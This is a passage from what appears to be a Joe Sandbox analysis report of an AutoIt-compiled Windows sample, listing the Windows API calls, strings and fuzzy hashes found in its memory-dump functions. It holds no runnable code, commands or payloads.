                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memmove_strlen$ErrorLasthtonsinet_ntoa
                                                                                                                • String ID:
                                                                                                                • API String ID: 3619996494-0
                                                                                                                • Opcode ID: 3fff1f4204d8e0bc6fbdd025186db349a55d576299841d3d73b73b6bd04a2593
                                                                                                                • Instruction ID: 01ebfaf30d5a58d61acca20c33ed05baf247bd78e8392b8d0b6031a67591c368
                                                                                                                • Opcode Fuzzy Hash: 3fff1f4204d8e0bc6fbdd025186db349a55d576299841d3d73b73b6bd04a2593
                                                                                                                • Instruction Fuzzy Hash: 6381E171204700AFD754EB24CC82EABB7ABAF84714F108A1DF95A9B2D2DB70ED05CB55
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID:
                                                                                                                • String ID:
                                                                                                                • API String ID:
                                                                                                                • Opcode ID: 3791453605859e3f66b437746ecabfee9aabaa1a6238c1605dbb7151b78336d0
                                                                                                                • Instruction ID: 9e1ff829fce2d0374b062f0c3db40f3cdd3cb54b274de8c8d5a47e4dbc53ac97
                                                                                                                • Opcode Fuzzy Hash: 3791453605859e3f66b437746ecabfee9aabaa1a6238c1605dbb7151b78336d0
                                                                                                                • Instruction Fuzzy Hash: 95715F70940109EFCB09CF94CC89AFFBBB6FF86314F148159F915AA291C7349A51CBA4
                                                                                                                APIs
                                                                                                                • IsWindow.USER32(01425550), ref: 0068B3EB
                                                                                                                • IsWindowEnabled.USER32(01425550), ref: 0068B3F7
                                                                                                                • SendMessageW.USER32(?,0000041C,00000000,00000000), ref: 0068B4DB
                                                                                                                • SendMessageW.USER32(01425550,000000B0,?,?), ref: 0068B512
                                                                                                                • IsDlgButtonChecked.USER32(?,?), ref: 0068B54F
                                                                                                                • GetWindowLongW.USER32(01425550,000000EC), ref: 0068B571
                                                                                                                • SendMessageW.USER32(?,000000A1,00000002,00000000), ref: 0068B589
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSendWindow$ButtonCheckedEnabledLong
                                                                                                                • String ID:
                                                                                                                • API String ID: 4072528602-0
                                                                                                                • Opcode ID: 8564b061c43c6ea3794ee4b1d7db26109adb531f7778cc830c49ca4c80390249
                                                                                                                • Instruction ID: 088e4234b3b9e6f03f7ef7ce3d93c956386b094d29e97ff92f51a139fb8568ee
                                                                                                                • Opcode Fuzzy Hash: 8564b061c43c6ea3794ee4b1d7db26109adb531f7778cc830c49ca4c80390249
                                                                                                                • Instruction Fuzzy Hash: AE718C34601604EFDB20AF54C895FFA7BFBEF09300F146259E946973A6C731A981CB50
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 0067F448
                                                                                                                • _memset.LIBCMT ref: 0067F511
                                                                                                                • ShellExecuteExW.SHELL32(?), ref: 0067F556
                                                                                                                  • Part of subcall function 00609837: __itow.LIBCMT ref: 00609862
                                                                                                                  • Part of subcall function 00609837: __swprintf.LIBCMT ref: 006098AC
                                                                                                                  • Part of subcall function 0061FC86: _wcscpy.LIBCMT ref: 0061FCA9
                                                                                                                • GetProcessId.KERNEL32(00000000), ref: 0067F5CD
                                                                                                                • CloseHandle.KERNEL32(00000000), ref: 0067F5FC
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _memset$CloseExecuteHandleProcessShell__itow__swprintf_wcscpy
                                                                                                                • String ID: @
                                                                                                                • API String ID: 3522835683-2766056989
                                                                                                                • Opcode ID: c7ab7a959d8d16af9c16acc9ab47295900d92c9e7e816141c62cf0f97955b35f
                                                                                                                • Instruction ID: 9e4c2e4f93e2fc73599d2926ed2d0a47b5e2bc0e96a9c7853be3ca48824150d8
                                                                                                                • Opcode Fuzzy Hash: c7ab7a959d8d16af9c16acc9ab47295900d92c9e7e816141c62cf0f97955b35f
                                                                                                                • Instruction Fuzzy Hash: 7A618DB5A006199FCB54DF64C8819AEBBF6FF48310F14856DE859AB392CB30AD41CF94
                                                                                                                APIs
                                                                                                                • GetParent.USER32(?), ref: 00660F8C
                                                                                                                • GetKeyboardState.USER32(?), ref: 00660FA1
                                                                                                                • SetKeyboardState.USER32(?), ref: 00661002
                                                                                                                • PostMessageW.USER32(?,00000101,00000010,?), ref: 00661030
                                                                                                                • PostMessageW.USER32(?,00000101,00000011,?), ref: 0066104F
                                                                                                                • PostMessageW.USER32(?,00000101,00000012,?), ref: 00661095
                                                                                                                • PostMessageW.USER32(?,00000101,0000005B,?), ref: 006610B8
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                • String ID:
                                                                                                                • API String ID: 87235514-0
                                                                                                                • Opcode ID: b78565f541ce2857b649b437e14cff486acbda94abce64388d132a2eacaa0f31
                                                                                                                • Instruction ID: 2c413e9bcd1cd71f8a2723f704090f19f8b25517858924b8509fc2d1e95d5c8e
                                                                                                                • Opcode Fuzzy Hash: b78565f541ce2857b649b437e14cff486acbda94abce64388d132a2eacaa0f31
                                                                                                                • Instruction Fuzzy Hash: EE51FFA06046D53DFB3243348C15BFABEAB5B07304F0C8589E1D48A9D2D6A9ECC9D751
                                                                                                                APIs
                                                                                                                • GetParent.USER32(00000000), ref: 00660DA5
                                                                                                                • GetKeyboardState.USER32(?), ref: 00660DBA
                                                                                                                • SetKeyboardState.USER32(?), ref: 00660E1B
                                                                                                                • PostMessageW.USER32(00000000,00000100,00000010,?), ref: 00660E47
                                                                                                                • PostMessageW.USER32(00000000,00000100,00000011,?), ref: 00660E64
                                                                                                                • PostMessageW.USER32(00000000,00000100,00000012,?), ref: 00660EA8
                                                                                                                • PostMessageW.USER32(00000000,00000100,0000005B,?), ref: 00660EC9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessagePost$KeyboardState$Parent
                                                                                                                • String ID:
                                                                                                                • API String ID: 87235514-0
                                                                                                                • Opcode ID: 28ac49d4e0b85a2aaf01ccad39479f09615ea7a0eda5eddc989c3e6154ee0e33
                                                                                                                • Instruction ID: ff34772b8126d5b3c0734160b9e8e6132eb7e8ddeb1438f5422a05ecb8a12586
                                                                                                                • Opcode Fuzzy Hash: 28ac49d4e0b85a2aaf01ccad39479f09615ea7a0eda5eddc989c3e6154ee0e33
                                                                                                                • Instruction Fuzzy Hash: 3251F4A05447E53DFB3683748C55BBBBFAA5F06300F0889ADE1D44A9C2D3A6EC98D750
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _wcsncpy$LocalTime
                                                                                                                • String ID:
                                                                                                                • API String ID: 2945705084-0
                                                                                                                • Opcode ID: 8edb5fa548f053832ebe8a62fe019c560ea2e7f19308fef26a5cb73a490f802b
                                                                                                                • Instruction ID: 88956ebadb5936ca9c77a6ad898e1df054a4a2d7d4da0b137d0080823f3df47e
                                                                                                                • Opcode Fuzzy Hash: 8edb5fa548f053832ebe8a62fe019c560ea2e7f19308fef26a5cb73a490f802b
                                                                                                                • Instruction Fuzzy Hash: 9E41D565C10A2476CB51EBB4DC479CFB7BA9F04310F50895AF509E3221FB34A385CBAA
                                                                                                                APIs
                                                                                                                • CoCreateInstance.OLE32(?,00000000,00000005,?,?,?,?,?,?,?,?,?,?,?), ref: 0065D5D4
                                                                                                                • SetErrorMode.KERNEL32(00000001,?,?,?,?,?,?,?,?,?), ref: 0065D60A
                                                                                                                • GetProcAddress.KERNEL32(?,DllGetClassObject), ref: 0065D61B
                                                                                                                • SetErrorMode.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 0065D69D
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorMode$AddressCreateInstanceProc
                                                                                                                • String ID: ,,i$DllGetClassObject
                                                                                                                • API String ID: 753597075-1121700710
                                                                                                                • Opcode ID: cdebda7f49abe46150abc67452b6a8fe4eab329be5b06c9ad503b72c38c2c0e8
                                                                                                                • Instruction ID: 26af33cd42e2d676f65ba43e5eda1092268f022bf402c8cb184788792bada2ca
                                                                                                                • Opcode Fuzzy Hash: cdebda7f49abe46150abc67452b6a8fe4eab329be5b06c9ad503b72c38c2c0e8
                                                                                                                • Instruction Fuzzy Hash: 8B418FB1600204EFDF25DF54C884A9A7BAAEF44311F1581ADEC09DF245D7B1D949CBA0
                                                                                                                APIs
                                                                                                                  • Part of subcall function 0066466E: GetFullPathNameW.KERNEL32(00000000,00007FFF,?,?,?,?,?,?,00663697,?), ref: 0066468B
                                                                                                                  • Part of subcall function 0066466E: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,?,?,00663697,?), ref: 006646A4
                                                                                                                • lstrcmpiW.KERNEL32(?,?), ref: 006636B7
                                                                                                                • _wcscmp.LIBCMT ref: 006636D3
                                                                                                                • MoveFileW.KERNEL32(?,?), ref: 006636EB
                                                                                                                • _wcscat.LIBCMT ref: 00663733
                                                                                                                • SHFileOperationW.SHELL32(?), ref: 0066379F
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileFullNamePath$MoveOperation_wcscat_wcscmplstrcmpi
                                                                                                                • String ID: \*.*
                                                                                                                • API String ID: 1377345388-1173974218
                                                                                                                • Opcode ID: 121569fc25a84986ea2c26d33a6f28dadb5dea4dedf60ba15c26b241721e2844
                                                                                                                • Instruction ID: 182df2e471ce482dde6a54fff4d5bbd76f0f5c239ce9c0024fe638bd3f4d48ec
                                                                                                                • Opcode Fuzzy Hash: 121569fc25a84986ea2c26d33a6f28dadb5dea4dedf60ba15c26b241721e2844
                                                                                                                • Instruction Fuzzy Hash: 3A418371508354AEC751EF64D4419DFB7EAEF89340F00092EF49AC3251EB34D689CB56
                                                                                                                APIs
                                                                                                                • _memset.LIBCMT ref: 006872AA
                                                                                                                • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 00687351
                                                                                                                • IsMenu.USER32(?), ref: 00687369
                                                                                                                • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 006873B1
                                                                                                                • DrawMenuBar.USER32 ref: 006873C4
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Menu$Item$DrawInfoInsert_memset
                                                                                                                • String ID: 0
                                                                                                                • API String ID: 3866635326-4108050209
                                                                                                                • Opcode ID: 651a97baa9fbf405077ad3e1b60ff2f8091e7e9b2b9843e7f8d59cd38bdfc55c
                                                                                                                • Instruction ID: be8b696101134405951e09292d2135bdb2dd3eb1123d1a154f94da3c0f27a1b4
                                                                                                                • Opcode Fuzzy Hash: 651a97baa9fbf405077ad3e1b60ff2f8091e7e9b2b9843e7f8d59cd38bdfc55c
                                                                                                                • Instruction Fuzzy Hash: 95412575A04209AFDB20EF50D884EEABBBAFB04311F249629FD15A7360D730ED50EB51
                                                                                                                APIs
                                                                                                                • RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?,?,?), ref: 00680FD4
                                                                                                                • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00680FFE
                                                                                                                • FreeLibrary.KERNEL32(00000000), ref: 006810B5
                                                                                                                  • Part of subcall function 00680FA5: RegCloseKey.ADVAPI32(?), ref: 0068101B
                                                                                                                  • Part of subcall function 00680FA5: FreeLibrary.KERNEL32(?), ref: 0068106D
                                                                                                                  • Part of subcall function 00680FA5: RegEnumKeyExW.ADVAPI32(?,00000000,?,000000FF,00000000,00000000,00000000,?), ref: 00681090
                                                                                                                • RegDeleteKeyW.ADVAPI32(?,?), ref: 00681058
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: EnumFreeLibrary$CloseDeleteOpen
                                                                                                                • String ID:
                                                                                                                • API String ID: 395352322-0
                                                                                                                • Opcode ID: 4463ce4d91cff3d2d3befa40ee2264c120430020ac0eb89df64ca8a968f28f0d
                                                                                                                • Instruction ID: a1d8b6620e6f4365dc65f619d6373ecc95aeb4faab79c5c8193ef359a5d83949
                                                                                                                • Opcode Fuzzy Hash: 4463ce4d91cff3d2d3befa40ee2264c120430020ac0eb89df64ca8a968f28f0d
                                                                                                                • Instruction Fuzzy Hash: 47312F71900109BFEB159F90DC89EFFB7BDEF09300F100269E501E6241DA745E8A9BA0
                                                                                                                APIs
                                                                                                                • SendMessageW.USER32(00000000,000000F0,00000000,00000000), ref: 006862EC
                                                                                                                • GetWindowLongW.USER32(01425550,000000F0), ref: 0068631F
                                                                                                                • GetWindowLongW.USER32(01425550,000000F0), ref: 00686354
                                                                                                                • SendMessageW.USER32(00000000,000000F1,00000000,00000000), ref: 00686386
                                                                                                                • SendMessageW.USER32(00000000,000000F1,00000001,00000000), ref: 006863B0
                                                                                                                • GetWindowLongW.USER32(00000000,000000F0), ref: 006863C1
                                                                                                                • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 006863DB
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: LongWindow$MessageSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 2178440468-0
                                                                                                                • Opcode ID: 4740b6be2ab3e9c90aa7d1d98925da76fc5b16f4220c515456771401fa3c938d
                                                                                                                • Instruction ID: 06e6676fd2a6ba92e41df41bc57614884c1068cb39a392f04309e8421e354c98
                                                                                                                • Opcode Fuzzy Hash: 4740b6be2ab3e9c90aa7d1d98925da76fc5b16f4220c515456771401fa3c938d
                                                                                                                • Instruction Fuzzy Hash: D931F230644250AFDB21DF18EC89FA537E2FB4A714F1922A8F501DF2B2CB71AC809B51
                                                                                                                APIs
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0065DB2E
                                                                                                                • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 0065DB54
                                                                                                                • SysAllocString.OLEAUT32(00000000), ref: 0065DB57
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 0065DB75
                                                                                                                • SysFreeString.OLEAUT32(?), ref: 0065DB7E
                                                                                                                • StringFromGUID2.OLE32(?,?,00000028), ref: 0065DBA3
                                                                                                                • SysAllocString.OLEAUT32(?), ref: 0065DBB1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: String$Alloc$ByteCharMultiWide$FreeFrom
                                                                                                                • String ID:
                                                                                                                • API String ID: 3761583154-0
                                                                                                                • Opcode ID: d8232d4c8dc42d8327d3e074c52feeeb19c90a29effce6c6eb25e0f4f0a07740
                                                                                                                • Instruction ID: e03bdcbfed8fbe2b896f974e439d21f718f2ab17895144662aca98ec66f3feab
                                                                                                                • Opcode Fuzzy Hash: d8232d4c8dc42d8327d3e074c52feeeb19c90a29effce6c6eb25e0f4f0a07740
                                                                                                                • Instruction Fuzzy Hash: E2218176600219BFEF20DFA8DC88CBB73EEEB09361B118526FD54DB291D6709C458764
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00677D8B: inet_addr.WSOCK32(00000000,?,00000000,?,?,?,00000000), ref: 00677DB6
                                                                                                                • socket.WSOCK32(00000002,00000001,00000006,?,?,00000000), ref: 006761C6
                                                                                                                • WSAGetLastError.WSOCK32(00000000), ref: 006761D5
                                                                                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 0067620E
                                                                                                                • connect.WSOCK32(00000000,?,00000010), ref: 00676217
                                                                                                                • WSAGetLastError.WSOCK32 ref: 00676221
                                                                                                                • closesocket.WSOCK32(00000000), ref: 0067624A
                                                                                                                • ioctlsocket.WSOCK32(00000000,8004667E,00000000), ref: 00676263
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorLastioctlsocket$closesocketconnectinet_addrsocket
                                                                                                                • String ID:
                                                                                                                • API String ID: 910771015-0
                                                                                                                • Opcode ID: ceb577c971a2154805b0afc630d2e7b154fe4da70ed644e9c0c770e724dac14c
                                                                                                                • Instruction ID: 4d8b190e84cacf5518fc2c38a71b5076754b1bf440ec73d81d6b3706c1a41e75
                                                                                                                • Opcode Fuzzy Hash: ceb577c971a2154805b0afc630d2e7b154fe4da70ed644e9c0c770e724dac14c
                                                                                                                • Instruction Fuzzy Hash: EA31A471600504ABDF50AF24CC85BBE7BAAEF45710F048569FD19A7292DB70AD448B61
                                                                                                                APIs
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.1515608692.0000000000601000.00000020.00000001.01000000.00000003.sdmp, Offset: 00600000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.1515578987.0000000000600000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.000000000068F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515673064.00000000006B4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515728006.00000000006BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                • Associated: 00000000.00000002.1515749079.00000000006C7000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_600000_lsc5QN46NH.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: __wcsnicmp
                                                                                                                • String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
                                                                                                                • API String ID: 1038674560-2734436370
                                                                                                                • Opcode ID: 69d358e4ebde68215656f2c0f24aa48dd6c88d5412122284fdda8664ebe5fab7
                                                                                                                • Instruction ID: cff82ee36e9d5634a544b189d3fff170111e95712caeccfec748d34a66ed4a00
                                                                                                                • Opcode Fuzzy Hash: 69d358e4ebde68215656f2c0f24aa48dd6c88d5412122284fdda8664ebe5fab7
                                                                                                                • Instruction Fuzzy Hash: F12179722045227AD620A734FC12EE773DFDF59301F10443DFC8187291EB919D8AD698
